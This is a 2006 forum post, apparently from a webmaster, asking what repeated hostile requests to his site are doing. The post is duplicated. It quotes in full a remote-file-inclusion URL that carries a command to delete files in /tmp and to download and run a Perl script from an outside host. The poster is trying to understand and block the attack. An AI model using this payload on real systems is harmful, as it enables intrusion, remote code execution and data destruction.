aeronautic.net
Jun 25th 2006, 4:52 pm
I've been seeing dozens of hits to various urls on one of my sites from IPs all over the world in the past few days constructed like this string:
http://A-SNIPPEDDOMAINDOTCOM/SNIPPEDPATH/SNIPPED/index.php?
_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=
http://www.shinwhat.com/cms/tool.gif?&cmd=cd%20/tmp/;rm%20-rf%20*;fetch%20http://www.shinwhat.com/cms/bt.pl;
wget%20http://www.shinwhat.com/cms/bt.pl;curl%20-O%20http://www.shinwhat.com/cms/bt.pl;
perl%20bt.pl;perl%20bt.pl.1;perl%20bt.pl.2?
All contain that reference to shinwhat.com
Yes, I've written them but the hits keep coming. They are just kicking 403s but I'd like to know what this script (zombie?) is trying to pull off.
Any ideas?
Thanks!
http://A-SNIPPEDDOMAINDOTCOM/SNIPPEDPATH/SNIPPED/index.php?
_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=
http://www.shinwhat.com/cms/tool.gif?&cmd=cd%20/tmp/;rm%20-rf%20*;fetch%20http://www.shinwhat.com/cms/bt.pl;
wget%20http://www.shinwhat.com/cms/bt.pl;curl%20-O%20http://www.shinwhat.com/cms/bt.pl;
perl%20bt.pl;perl%20bt.pl.1;perl%20bt.pl.2?
All contain that reference to shinwhat.com
Yes, I've written them but the hits keep coming. They are just kicking 403s but I'd like to know what this script (zombie?) is trying to pull off.
Any ideas?
Thanks!